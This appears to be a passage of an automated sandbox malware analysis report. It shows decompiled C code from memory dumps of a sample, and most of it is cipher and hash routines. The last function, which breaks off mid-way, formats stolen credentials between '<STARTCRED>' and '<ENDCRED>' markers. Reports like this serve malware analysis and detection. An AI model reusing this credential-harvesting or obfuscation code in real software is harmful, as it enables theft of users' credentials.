    				__edx[5] = (((__ecx[0x14] & 0x000000ff) << 0x00000008 | __ecx[0x15] & 0x000000ff) << 0x00000008 | __ecx[0x16] & 0x000000ff) << 0x00000008 | __ecx[0x17] & 0x000000ff;
    				__edx[6] = (((__ecx[0x18] & 0x000000ff) << 0x00000008 | __ecx[0x19] & 0x000000ff) << 0x00000008 | __ecx[0x1a] & 0x000000ff) << 0x00000008 | __ecx[0x1b] & 0x000000ff;
    				__edx[7] = (((__ecx[0x1c] & 0x000000ff) << 0x00000008 | __ecx[0x1d] & 0x000000ff) << 0x00000008 | __ecx[0x1e] & 0x000000ff) << 0x00000008 | __ecx[0x1f] & 0x000000ff;
    				do {
    					_t112 = _t244[7];
    					_t184 = _t125 & 0x80000007;
    					if(_t184 < 0) {
    						_t184 = (_t184 - 0x00000001 | 0xfffffff8) + 1;
    						_t255 = _t184;
    					}
    					if(_t255 != 0) {
    						if(_t184 == 4) {
    							_t191 = _t112 >> 0x00000018 & 0x0000000f;
    							_t235 = (_t112 >> 0x1c) + (_t112 >> 0x1c);
    							_t194 = _t112 >> 0x00000010 & 0x0000000f;
    							_t239 = (_t112 >> 0x00000014 & 0x0000000f) + (_t112 >> 0x00000014 & 0x0000000f);
    							_t198 = _t112 >> 0x00000008 & 0x0000000f;
    							_t243 = (_t112 >> 0x0000000c & 0x0000000f) + (_t112 >> 0x0000000c & 0x0000000f);
    							_t245 = ((( *(_t191 + 0xc680a8 + _t235 * 8) & 0x000000ff) << 8) + ( *(_t194 + 0xc680a8 + _t239 * 8) & 0x000000ff) << 8) + ( *(_t198 + 0xc680a8 + _t243 * 8) & 0x000000ff) << 8;
    							_t112 = ( *((_t112 & 0x0000000f) + 0xc680a8 + ((_t112 >> 0x00000004 & 0x0000000f) + (_t112 >> 0x00000004 & 0x0000000f)) * 8) & 0x000000ff) + (((( *(_t191 + 0xc680a8 + _t235 * 8) & 0x000000ff) << 8) + ( *(_t194 + 0xc680a8 + _t239 * 8) & 0x000000ff) << 8) + ( *(_t198 + 0xc680a8 + _t243 * 8) & 0x000000ff) << 8);
    						}
    					} else {
    						asm("rol eax, 0x8");
    						_t246 = _t112;
    						_t245 = _t246 & 0x0000000f;
    						_t124 = (((( *((_t112 >> 0x00000018 & 0x0000000f) + 0xc680a8 + ((_t246 >> 0x1c) + (_t246 >> 0x1c)) * 8) & 0x000000ff) << 8) + ( *((_t246 >> 0x00000010 & 0x0000000f) + 0xc680a8 + ((_t246 >> 0x00000014 & 0x0000000f) + (_t246 >> 0x00000014 & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t246 >> 0x00000008 & 0x0000000f) + 0xc680a8 + ((_t246 >> 0x0000000c & 0x0000000f) + (_t246 >> 0x0000000c & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t246 & 0x0000000f) + 0xc680a8 + ((_t246 >> 0x00000004 & 0x0000000f) + (_t246 >> 0x00000004 & 0x0000000f)) * 8) & 0x000000ff);
    						_t68 = _t125 - 1; // 0x7
    						_t220 = _t68;
    						if(_t220 < 0) {
    							_t220 = _t220 + 7;
    						}
    						_t112 = _t124 ^  *(_t252 + (_t220 >> 3) * 4 - 0x40);
    					}
    					_t125 = _t125 + 1;
    					_t244[8] =  *_t244 ^ _t112;
    					_t244 =  &(_t244[1]);
    				} while (_t125 < 0x3c);
    				return E00C51252(_t125, _v8 ^ _t252, _t244, _t245);
    			}
    0x00c5fd26
    0x00c5fd2d
    0x00c5fd32
    0x00c5fd34
    0x00c5fd3c
    0x00c5fd3e
    0x00c5fd45
    0x00c5fd58
    0x00c5fd68
    0x00c5fd78
    0x00c5fd7f
    0x00c5fd8e
    0x00c5fd9e
    0x00c5fdae
    0x00c5fdb5
    0x00c5fdc5
    0x00c5fdd5
    0x00c5fde5
    0x00c5fdec
    0x00c5fdfc
    0x00c5fe0c
    0x00c5fe1c
    0x00c5fe23
    0x00c5fe45
    0x00c5fe5e
    0x00c5fe6c
    0x00c5fe8e
    0x00c5feb0
    0x00c5feb3
    0x00c5feb3
    0x00c5feb8
    0x00c5febe
    0x00c5fec4
    0x00c5fec4
    0x00c5fec4
    0x00c5fec5
    0x00c5ff55
    0x00c5ff5e
    0x00c5ff64
    0x00c5ff7b
    0x00c5ff81
    0x00c5ff9d
    0x00c5ffa0
    0x00c5ffb7
    0x00c5ffc4
    0x00c5ffc4
    0x00c5fecb
    0x00c5fecb
    0x00c5fece
    0x00c5ff28
    0x00c5ff3b
    0x00c5ff3d
    0x00c5ff3d
    0x00c5ff44
    0x00c5ff46
    0x00c5ff46
    0x00c5ff4c
    0x00c5ff4c
    0x00c5ffc8
    0x00c5ffcb
    0x00c5ffce
    0x00c5ffd1
    0x00c5ffea

    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 97%
    			E00C5F6A0(signed char* __ecx) {
    				signed int _v5;
    				signed int _v6;
    				signed char _t226;
    				signed char _t229;
    				signed char _t231;
    				signed char _t233;
    				signed char _t235;
    				signed char _t238;
    				signed int _t239;
    				signed int _t240;
    				signed char _t241;
    				signed int _t242;
    				signed int _t243;
    				signed char _t244;
    				signed int _t245;
    				signed int _t246;
    				signed char _t247;
    				signed int _t248;
    				signed int _t249;
    				signed char _t250;
    				signed int _t251;
    				signed char _t252;
    				signed int _t253;
    				signed char _t254;
    				signed int _t255;
    				signed char _t256;
    				signed int _t257;
    				signed int _t262;
    				signed int _t263;
    				signed int _t264;
    				signed int _t265;
    
    				_push(__ecx);
    				_t238 = __ecx[4];
    				_t229 = __ecx[0xc];
    				_t250 = __ecx[8];
    				_t147 = _t229 & 0x000000ff;
    				_v5 = _t238;
    				_v6 = _t250;
    				_t262 = (_t229 & 0x000000ff) + _t147 * 2;
    				_t239 = (_t238 & 0x000000ff) + (_t238 & 0x000000ff) * 2;
    				 *__ecx =  *(0xc67aa9 + _t239 * 2) & 0x000000ff ^  *(0xc67aa8 + _t262 * 2) ^ _t229 ^ _t250;
    				_t251 = (_t250 & 0x000000ff) + (_t250 & 0x000000ff) * 2;
    				__ecx[4] =  *(0xc67aa9 + _t251 * 2) & 0x000000ff ^  *(0xc67aa8 + _t239 * 2) ^ _t229 ^ _t229;
    				_t240 = (_t229 & 0x000000ff) + (_t229 & 0x000000ff) * 2;
    				_t252 = __ecx[9];
    				_t231 = __ecx[1];
    				__ecx[8] =  *(0xc67aa9 + _t240 * 2) & 0x000000ff ^  *(0xc67aa8 + _t251 * 2) ^ _v5 ^ __ecx[0xd];
    				_t241 = __ecx[5];
    				__ecx[0xc] =  *(0xc67aa8 + _t240 * 2) & 0x000000ff ^  *(0xc67aa9 + _t262 * 2) ^ _v6 ^ _v5;
    				_t167 = _t231 & 0x000000ff;
    				_v6 = _t241;
    				_v5 = _t252;
    				_t263 = (_t231 & 0x000000ff) + _t167 * 2;
    				_t242 = (_t241 & 0x000000ff) + (_t241 & 0x000000ff) * 2;
    				__ecx[1] =  *(0xc67aa9 + _t242 * 2) & 0x000000ff ^  *(0xc67aa8 + _t263 * 2) ^ _t231 ^ _t252;
    				_t253 = (_t252 & 0x000000ff) + (_t252 & 0x000000ff) * 2;
    				__ecx[5] =  *(0xc67aa9 + _t253 * 2) & 0x000000ff ^  *(0xc67aa8 + _t242 * 2) ^ _t231 ^ _t231;
    				_t243 = (_t231 & 0x000000ff) + (_t231 & 0x000000ff) * 2;
    				_t254 = __ecx[0xa];
    				_t233 = __ecx[2];
    				__ecx[9] =  *(0xc67aa9 + _t243 * 2) & 0x000000ff ^  *(0xc67aa8 + _t253 * 2) ^ _v6 ^ __ecx[0xe];
    				_t244 = __ecx[6];
    				__ecx[0xd] =  *(0xc67aa8 + _t243 * 2) & 0x000000ff ^  *(0xc67aa9 + _t263 * 2) ^ _v5 ^ _v6;
    				_t187 = _t233 & 0x000000ff;
    				_v6 = _t244;
    				_v5 = _t254;
    				_t264 = (_t233 & 0x000000ff) + _t187 * 2;
    				_t245 = (_t244 & 0x000000ff) + (_t244 & 0x000000ff) * 2;
    				__ecx[2] =  *(0xc67aa9 + _t245 * 2) & 0x000000ff ^  *(0xc67aa8 + _t264 * 2) ^ _t233 ^ _t254;
    				_t255 = (_t254 & 0x000000ff) + (_t254 & 0x000000ff) * 2;
    				__ecx[6] =  *(0xc67aa9 + _t255 * 2) & 0x000000ff ^  *(0xc67aa8 + _t245 * 2) ^ _t233 ^ _t233;
    				_t246 = (_t233 & 0x000000ff) + (_t233 & 0x000000ff) * 2;
    				_t256 = __ecx[0xb];
    				_t235 = __ecx[3];
    				__ecx[0xa] =  *(0xc67aa9 + _t246 * 2) & 0x000000ff ^  *(0xc67aa8 + _t255 * 2) ^ _v6 ^ __ecx[0xf];
    				_t247 = __ecx[7];
    				__ecx[0xe] =  *(0xc67aa8 + _t246 * 2) & 0x000000ff ^  *(0xc67aa9 + _t264 * 2) ^ _v5 ^ _v6;
    				_t207 = _t235 & 0x000000ff;
    				_v6 = _t247;
    				_v5 = _t256;
    				_t265 = (_t235 & 0x000000ff) + _t207 * 2;
    				_t248 = (_t247 & 0x000000ff) + (_t247 & 0x000000ff) * 2;
    				__ecx[3] =  *(0xc67aa9 + _t248 * 2) & 0x000000ff ^  *(0xc67aa8 + _t265 * 2) ^ _t235 ^ _t256;
    				_t257 = (_t256 & 0x000000ff) + (_t256 & 0x000000ff) * 2;
    				__ecx[7] =  *(0xc67aa9 + _t257 * 2) & 0x000000ff ^  *(0xc67aa8 + _t248 * 2) ^ _t235 ^ _t235;
    				_t249 = (_t235 & 0x000000ff) + (_t235 & 0x000000ff) * 2;
    				__ecx[0xb] =  *(0xc67aa9 + _t249 * 2) & 0x000000ff ^  *(0xc67aa8 + _t257 * 2) ^ _v6 ^ _t235;
    				_t226 =  *(0xc67aa8 + _t249 * 2) & 0x000000ff ^  *(0xc67aa9 + _t265 * 2) ^ _v5 ^ _v6;
    				__ecx[0xf] = _t226;
    				return _t226;
    			}
    0x00c5f6a3
    0x00c5f6ab
    0x00c5f6ae
    0x00c5f6b1
    0x00c5f6b4
    0x00c5f6b7
    0x00c5f6ba
    0x00c5f6bd
    0x00c5f6c3
    0x00c5f6d9
    0x00c5f6de
    0x00c5f6f4
    0x00c5f6fd
    0x00c5f714
    0x00c5f717
    0x00c5f71a
    0x00c5f732
    0x00c5f735
    0x00c5f738
    0x00c5f73b
    0x00c5f73e
    0x00c5f741
    0x00c5f747
    0x00c5f75d
    0x00c5f763
    0x00c5f779
    0x00c5f782
    0x00c5f797
    0x00c5f79c
    0x00c5f79f
    0x00c5f7b7
    0x00c5f7ba
    0x00c5f7bd
    0x00c5f7c0
    0x00c5f7c3
    0x00c5f7c6
    0x00c5f7cc
    0x00c5f7e2
    0x00c5f7e8
    0x00c5f7fe
    0x00c5f807
    0x00c5f81e
    0x00c5f821
    0x00c5f824
    0x00c5f83c
    0x00c5f83f
    0x00c5f842
    0x00c5f845
    0x00c5f848
    0x00c5f84b
    0x00c5f851
    0x00c5f867
    0x00c5f86d
    0x00c5f883
    0x00c5f889
    0x00c5f8a0
    0x00c5f8b5
    0x00c5f8b8
    0x00c5f8c1

    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 100%
    			E00C5F3F0(signed char* __ecx) {
    				signed char* _v8;
    				intOrPtr _v12;
    				signed char _t278;
    				signed char* _t279;
    				signed char* _t281;
    				signed char* _t283;
    				signed char* _t285;
    				signed int _t287;
    				signed int _t289;
    				signed int _t291;
    				signed int _t293;
    				intOrPtr _t294;
    				signed int _t296;
    				signed int _t298;
    				signed int _t300;
    				signed int _t301;
    				signed int _t302;
    				signed int _t303;
    				signed int _t304;
    				signed int _t305;
    				signed int _t306;
    				signed int _t307;
    				signed int _t308;
    
    				_v8 = __ecx;
    				_t279 = _v8;
    				_v12 = ( *__ecx & 0x000000ff) + ( *__ecx & 0x000000ff) * 2 + ( *__ecx & 0x000000ff) + ( *__ecx & 0x000000ff) * 2;
    				_t294 = _v12;
    				_t301 = (__ecx[4] & 0x000000ff) + (__ecx[4] & 0x000000ff) * 2;
    				_t305 = (__ecx[8] & 0x000000ff) + (__ecx[8] & 0x000000ff) * 2;
    				_t287 = (__ecx[0xc] & 0x000000ff) + (__ecx[0xc] & 0x000000ff) * 2;
    				 *_t279 =  *(0xc67aaa + _t287 * 2) & 0x000000ff ^  *(0xc67aac + _t305 * 2) ^  *(0xc67aab + _t301 * 2) ^  *(_t294 + 0xc67aad);
    				_t279[4] =  *(0xc67aac + _t287 * 2) & 0x000000ff ^  *(0xc67aab + _t305 * 2) ^  *(0xc67aad + _t301 * 2) ^  *(_t294 + 0xc67aaa);
    				_t279[8] =  *(0xc67aab + _t287 * 2) & 0x000000ff ^  *(0xc67aad + _t305 * 2) ^  *(0xc67aaa + _t301 * 2) ^  *(_t294 + 0xc67aac);
    				_t279[0xc] =  *(0xc67aad + _t287 * 2) & 0x000000ff ^  *(0xc67aaa + _t305 * 2) ^  *(0xc67aac + _t301 * 2) ^  *(_t294 + 0xc67aab);
    				_t302 = (_t279[1] & 0x000000ff) + (_t279[1] & 0x000000ff) * 2;
    				_t306 = (_t279[5] & 0x000000ff) + (_t279[5] & 0x000000ff) * 2;
    				_t296 = (_t279[9] & 0x000000ff) + (_t279[9] & 0x000000ff) * 2;
    				_t281 = _v8;
    				_t289 = (_t279[0xd] & 0x000000ff) + (_t279[0xd] & 0x000000ff) * 2;
    				 *(_t281 + 1) =  *(0xc67aaa + _t289 * 2) & 0x000000ff ^  *(0xc67aac + _t296 * 2) ^  *(0xc67aab + _t306 * 2) ^  *(0xc67aad + _t302 * 2);
    				 *(_t281 + 5) =  *(0xc67aac + _t289 * 2) & 0x000000ff ^  *(0xc67aab + _t296 * 2) ^  *(0xc67aad + _t306 * 2) ^  *(0xc67aaa + _t302 * 2);
    				 *(_t281 + 9) =  *(0xc67aab + _t289 * 2) & 0x000000ff ^  *(0xc67aad + _t296 * 2) ^  *(0xc67aaa + _t306 * 2) ^  *(0xc67aac + _t302 * 2);
    				 *(_t281 + 0xd) =  *(0xc67aad + _t289 * 2) & 0x000000ff ^  *(0xc67aaa + _t296 * 2) ^  *(0xc67aac + _t306 * 2) ^  *(0xc67aab + _t302 * 2);
    				_t303 = ( *(_t281 + 2) & 0x000000ff) + ( *(_t281 + 2) & 0x000000ff) * 2;
    				_t307 = ( *(_t281 + 6) & 0x000000ff) + ( *(_t281 + 6) & 0x000000ff) * 2;
    				_t298 = ( *(_t281 + 0xa) & 0x000000ff) + ( *(_t281 + 0xa) & 0x000000ff) * 2;
    				_t291 = ( *(_t281 + 0xe) & 0x000000ff) + ( *(_t281 + 0xe) & 0x000000ff) * 2;
    				_t283 = _v8;
    				 *(_t283 + 2) =  *(0xc67aaa + _t291 * 2) & 0x000000ff ^  *(0xc67aac + _t298 * 2) ^  *(0xc67aab + _t307 * 2) ^  *(0xc67aad + _t303 * 2);
    				 *(_t283 + 6) =  *(0xc67aac + _t291 * 2) & 0x000000ff ^  *(0xc67aab + _t298 * 2) ^  *(0xc67aad + _t307 * 2) ^  *(0xc67aaa + _t303 * 2);
    				 *(_t283 + 0xa) =  *(0xc67aab + _t291 * 2) & 0x000000ff ^  *(0xc67aad + _t298 * 2) ^  *(0xc67aaa + _t307 * 2) ^  *(0xc67aac + _t303 * 2);
    				 *(_t283 + 0xe) =  *(0xc67aad + _t291 * 2) & 0x000000ff ^  *(0xc67aaa + _t298 * 2) ^  *(0xc67aac + _t307 * 2) ^  *(0xc67aab + _t303 * 2);
    				_t304 = ( *(_t283 + 3) & 0x000000ff) + ( *(_t283 + 3) & 0x000000ff) * 2;
    				_t308 = ( *(_t283 + 7) & 0x000000ff) + ( *(_t283 + 7) & 0x000000ff) * 2;
    				_t300 = ( *(_t283 + 0xb) & 0x000000ff) + ( *(_t283 + 0xb) & 0x000000ff) * 2;
    				_t285 = _v8;
    				_t293 = ( *(_t283 + 0xf) & 0x000000ff) + ( *(_t283 + 0xf) & 0x000000ff) * 2;
    				_t285[3] =  *(0xc67aaa + _t293 * 2) & 0x000000ff ^  *(0xc67aac + _t300 * 2) ^  *(0xc67aab + _t308 * 2) ^  *(0xc67aad + _t304 * 2);
    				_t285[7] =  *(0xc67aac + _t293 * 2) & 0x000000ff ^  *(0xc67aab + _t300 * 2) ^  *(0xc67aad + _t308 * 2) ^  *(0xc67aaa + _t304 * 2);
    				_t285[0xb] =  *(0xc67aab + _t293 * 2) & 0x000000ff ^  *(0xc67aad + _t300 * 2) ^  *(0xc67aaa + _t308 * 2) ^  *(0xc67aac + _t304 * 2);
    				_t278 =  *(0xc67aad + _t293 * 2) & 0x000000ff ^  *(0xc67aaa + _t300 * 2) ^  *(0xc67aac + _t308 * 2) ^  *(0xc67aab + _t304 * 2);
    				_t285[0xf] = _t278;
    				return _t278;
    			}
    0x00c5f3ff
    0x00c5f404
    0x00c5f407
    0x00c5f40e
    0x00c5f411
    0x00c5f418
    0x00c5f41f
    0x00c5f43e
    0x00c5f45c
    0x00c5f47b
    0x00c5f49d
    0x00c5f4ac
    0x00c5f4b2
    0x00c5f4b8
    0x00c5f4be
    0x00c5f4c1
    0x00c5f4e1
    0x00c5f501
    0x00c5f521
    0x00c5f547
    0x00c5f553
    0x00c5f559
    0x00c5f55f
    0x00c5f565
    0x00c5f568
    0x00c5f588
    0x00c5f5a8
    0x00c5f5c8
    0x00c5f5ee
    0x00c5f5fa
    0x00c5f600
    0x00c5f606
    0x00c5f60c
    0x00c5f60f
    0x00c5f62f
    0x00c5f64f
    0x00c5f66f
    0x00c5f688
    0x00c5f691
    0x00c5f698

    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 97%
    			E00C60F40(intOrPtr __ecx, char* __edx) {
    				void* __edi;
    				intOrPtr _t77;
    				unsigned int _t123;
    				int _t125;
    				char* _t130;
    				void* _t157;
    				void* _t164;
    				void* _t165;
    				void* _t166;
    				void* _t167;
    				intOrPtr _t170;
    				void* _t171;
    
    				_t170 = __ecx;
    				_t130 = __edx;
    				_t77 =  *((intOrPtr*)(__ecx + 0x40));
    				 *((char*)(_t77 + __ecx)) = 0x80;
    				_t157 = _t77 + 1;
    				if(_t77 >= 0x38) {
    					if(_t157 < 0x40) {
    						_t165 = _t157 + __ecx;
    						_t125 = memset(_t165, 0, 0x40 << 2);
    						_t166 = _t165 + (0x40 - _t157 >> 2);
    						memset(_t166, _t125, 0 << 0);
    						_t171 = _t171 + 0x18;
    						_t164 = _t166;
    					}
    					E00C61150(_t170, _t170);
    					E00C53610(_t164, _t170, 0, 0x38);
    				} else {
    					if(_t157 < 0x38) {
    						_t167 = _t157 + __ecx;
    						memset(_t167 + (0x38 - _t157 >> 2), memset(_t167, 0, 0x38 << 2), 0 << 0);
    					}
    				}
    				 *(_t170 + 0x48) =  *(_t170 + 0x48) + ( *(_t170 + 0x40) << 3);
    				asm("adc dword [esi+0x4c], 0x0");
    				 *((char*)(_t170 + 0x38)) =  *(_t170 + 0x48) & 0x000000ff;
    				 *((char*)(_t170 + 0x39)) = ( *(_t170 + 0x4c) << 0x00000020 |  *(_t170 + 0x48)) >> 8;
    				 *((char*)(_t170 + 0x3a)) = ( *(_t170 + 0x4c) << 0x00000020 |  *(_t170 + 0x48)) >> 0x10;
    				 *((char*)(_t170 + 0x3b)) = ( *(_t170 + 0x4c) << 0x00000020 |  *(_t170 + 0x48)) >> 0x18;
    				 *((char*)(_t170 + 0x3c)) = E00C5DE30( *(_t170 + 0x48), 0x20,  *(_t170 + 0x4c));
    				 *((char*)(_t170 + 0x3d)) = E00C5DE30( *(_t170 + 0x48), 0x28,  *(_t170 + 0x4c));
    				 *((char*)(_t170 + 0x3e)) =  *(_t170 + 0x4e) & 0x000000ff;
    				 *((char*)(_t170 + 0x3f)) =  *(_t170 + 0x4f) & 0x000000ff;
    				E00C61150(_t170, _t170);
    				 *_t130 =  *(_t170 + 0x50);
    				 *((char*)(_t130 + 4)) =  *(_t170 + 0x54);
    				 *((char*)(_t130 + 8)) =  *(_t170 + 0x58);
    				 *((char*)(_t130 + 0xc)) =  *(_t170 + 0x5c);
    				 *((char*)(_t130 + 1)) =  *(_t170 + 0x50) >> 8;
    				 *((char*)(_t130 + 5)) =  *(_t170 + 0x54) >> 8;
    				 *((char*)(_t130 + 9)) =  *(_t170 + 0x58) >> 8;
    				 *((char*)(_t130 + 0xd)) =  *(_t170 + 0x5c) >> 8;
    				 *((char*)(_t130 + 2)) =  *(_t170 + 0x50) >> 0x10;
    				 *((char*)(_t130 + 6)) =  *(_t170 + 0x54) >> 0x10;
    				 *((char*)(_t130 + 0xa)) =  *(_t170 + 0x58) >> 0x10;
    				 *((char*)(_t130 + 0xe)) =  *(_t170 + 0x5c) >> 0x10;
    				 *((char*)(_t130 + 3)) =  *(_t170 + 0x50) >> 0x18;
    				 *((char*)(_t130 + 7)) =  *(_t170 + 0x54) >> 0x18;
    				 *((char*)(_t130 + 0xb)) =  *(_t170 + 0x58) >> 0x18;
    				_t123 =  *(_t170 + 0x5c) >> 0x18;
    				 *(_t130 + 0xf) = _t123;
    				return _t123;
    			}

    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 100%
    			E00C5FC90(signed int* __ecx, signed int* __edx) {
    				signed char _t40;
    				unsigned int _t41;
    				unsigned int _t43;
    				unsigned int _t45;
    				unsigned int _t47;
    
    				_t41 =  *__edx;
    				__ecx[3] = __ecx[3] ^  *__edx;
    				__ecx[3] = __ecx[3] ^ __edx[1];
    				__ecx[3] = __ecx[3] ^ __edx[2];
    				_t40 = __edx[3];
    				__ecx[3] = __ecx[3] ^ _t40;
    				__ecx[2] = __ecx[2] ^ _t41 >> 0x00000008;
    				_t43 = __edx[1];
    				 *__ecx =  *__ecx ^ _t41 >> 0x00000018;
    				__ecx[1] = __ecx[1] ^ _t41 >> 0x00000010;
    				__ecx[2] = __ecx[2] ^ _t43 >> 0x00000008;
    				_t45 = __edx[2];
    				__ecx[0] = __ecx[0] ^ _t43 >> 0x00000018;
    				__ecx[1] = __ecx[1] ^ _t43 >> 0x00000010;
    				__ecx[2] = __ecx[2] ^ _t45 >> 0x00000008;
    				_t47 = __edx[3];
    				__ecx[0] = __ecx[0] ^ _t45 >> 0x00000018;
    				__ecx[1] = __ecx[1] ^ _t45 >> 0x00000010;
    				__ecx[2] = __ecx[2] ^ _t47 >> 0x00000008;
    				__ecx[0] = __ecx[0] ^ _t47 >> 0x00000018;
    				__ecx[1] = __ecx[1] ^ _t47 >> 0x00000010;
    				return _t40;
    			}

    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 55%
    			E10011D50(void* __ecx, intOrPtr __edx, signed char _a4) {
    				intOrPtr _v12;
    				void* _v16;
    				short _v18;
    				void* _v20;
    				void* _v24;
    				void* _v28;
    				void* _v32;
    				void* _v36;
    				void* _t93;
    				unsigned int _t99;
    				intOrPtr _t103;
    				void* _t108;
    				void* _t111;
    				void* _t112;
    				short _t114;
    				intOrPtr _t119;
    				intOrPtr* _t124;
    				signed char _t131;
    				signed short* _t136;
    				intOrPtr _t145;
    				intOrPtr _t146;
    				intOrPtr _t150;
    				intOrPtr _t151;
    				intOrPtr _t152;
    				intOrPtr _t153;
    				intOrPtr _t154;
    				intOrPtr _t155;
    				signed short* _t157;
    				intOrPtr _t159;
    				intOrPtr _t163;
    
    				_t93 = 0;
    				_v12 = __edx;
    				_t161 = __ecx;
    				_v20 = 0;
    				_t157 = 0;
    				_v24 = 0;
    				_v16 = 0;
    				if(__ecx == 0) {
    					L60:
    					return _t93;
    				}
    				_t93 =  *0x1001f3a4( *((intOrPtr*)(__edx + 0x20)),  &_v16);
    				_t131 = _a4;
    				if((_t131 & 0x08000000) == 0) {
    					if((_t131 & 0x00800000) == 0) {
    						if((_t131 & 0x00200000) != 0) {
    							goto L57;
    						}
    						if((_t131 & 0x00100000) == 0) {
    							if((_t131 & 0x00010000) == 0) {
    								L27:
    								if( *((intOrPtr*)(_t161 + 4)) != _t157 ||  *((intOrPtr*)(_t161 + 0xc)) != _t157 ||  *(_t161 + 0x14) != _t157) {
    									_t150 =  *0x1001f294; // 0xcaa50
    									if(E10014BD0(_t161, _t150) != 0 && E10014DA0() != 0) {
    										if((_t131 & 0x40000000) != 0) {
    											_v32 = _t161;
    										} else {
    											_v28 = _t161;
    										}
    									}
    									_t151 =  *0x1001f294; // 0xcaa50
    									if(E10014BD0(_t161 + 8, _t151) != 0 && E10014DA0() != 0) {
    										_t108 = _t161 + 8;
    										if((_t131 & 0x40000000) != 0) {
    											_v28 = _t108;
    										} else {
    											_v32 = _t108;
    										}
    									}
    									_t152 =  *0x1001f294; // 0xcaa50
    									if(E10014BD0(_t161 + 0x10, _t152) == 0) {
    										L49:
    										_t163 = _v32;
    										goto L50;
    									} else {
    										if((_t131 & 0x10000000) == 0) {
    											_t103 =  *0x1001f2f8; // 0x1001a788
    											_t75 = _t103 + 0x10; // 0x1001d81c
    											 *((intOrPtr*)( *((intOrPtr*)( *_t75))))( *(_t161 + 0x14),  *(_t161 + 0x12) & 0x0000ffff);
    										}
    										_t157 = _t161 + 0x10;
    										if(_t157 == 0) {
    											goto L49;
    										} else {
    											_t136 = _t157;
    											if(E10014DA0() == 0) {
    												goto L49;
    											}
    											_t99 =  *_t157 & 0x0000ffff;
    											if(_t99 > 0x20) {
    												goto L49;
    											}
    											_t163 = _v32;
    											if((_t131 & 0x00400000) == 0) {
    												_push("\n");
    												_push(L"<ENDCRED>");
    												_push(_t157);
    												_push(L"<STARTPASS>");
    												_push(_v28);
    												_push(_t163);
    												E10014340(_t136, L"%ls%wZ\\%wZ%ls%wZ%ls%ls", L"<STARTCRED>");
    											} else {
    												_push("\n");
    												_push(L"<ENDCRED>");
    												_push(_t157[2]);
    												_push(_t99 >> 1);
    												_push(L"<STARTPASS>");
    												_push(_v28);
    												_push(_t163);
    												E10014340(_t136, L"%ls%wZ\\%wZ%ls%.*s%ls%ls", L"<STARTCRED>");
    											}
    											L50:
    											_t93 = _v28;
    											if(_t93 != 0) {
    												_t93 = LocalFree( *(_t93 + 4));
    											}
    											if(_t163 != 0) {
    												_t93 = LocalFree( *(_t163 + 4));
    											}
    											if(_t157 != 0) {
    												_push(_t157[2]);
    												L56:
    												_t93 = LocalFree();
    											}
    											goto L57;
    										}
    									}
    								} else {
    									goto L57;
    								}
    							}
    							_t111 =  *(__ecx + 0x14);
    							if(_t111 == 0) {
    								L25:
    								_t93 = 0;
    								 *(_t161 + 0x10) = 0;
    								L26:
    								 *(_t161 + 0x14) = _t93;
    								goto L27;
    							}
    							_t112 = _t111 - 1;
    							if(_t112 == 0) {
    								 *(__ecx + 0x10) = 0;
    								 *(__ecx + 0x14) = 0;
    								_t114 =  *(__ecx + 0x18);
    								_t153 =  *0x1001f294; // 0xcaa50
    								_v18 = _t114;
    								_v20 = _t114;
    								_v16 =  *(__ecx + 0x1c);
    								E10014BD0( &_v20, _t153);
    								goto L25;
    							}
    							_t93 = _t112 - 1;
    							if(_t93 != 0) {
    								goto L27;
    							}
    							 *(__ecx + 0x10) =  *(__ecx + 0x18);
    							_t93 =  *(__ecx + 0x1c);
    							goto L26;
    						}
    						 *(__ecx + 0x10) =  *(__ecx + 0x14);
    						_t93 =  *(__ecx + 0x18);
    						goto L26;
    					}
    					if( *((intOrPtr*)(__ecx + 4)) == 0) {
    						goto L57;
    					}
    					_t154 =  *0x1001f294; // 0xcaa50
    					_t93 = E10014BD0(__ecx, _t154);
    					if(0 == 0) {
    						goto L57;
    					}
    					if((_t131 & 0x10000000) == 0) {
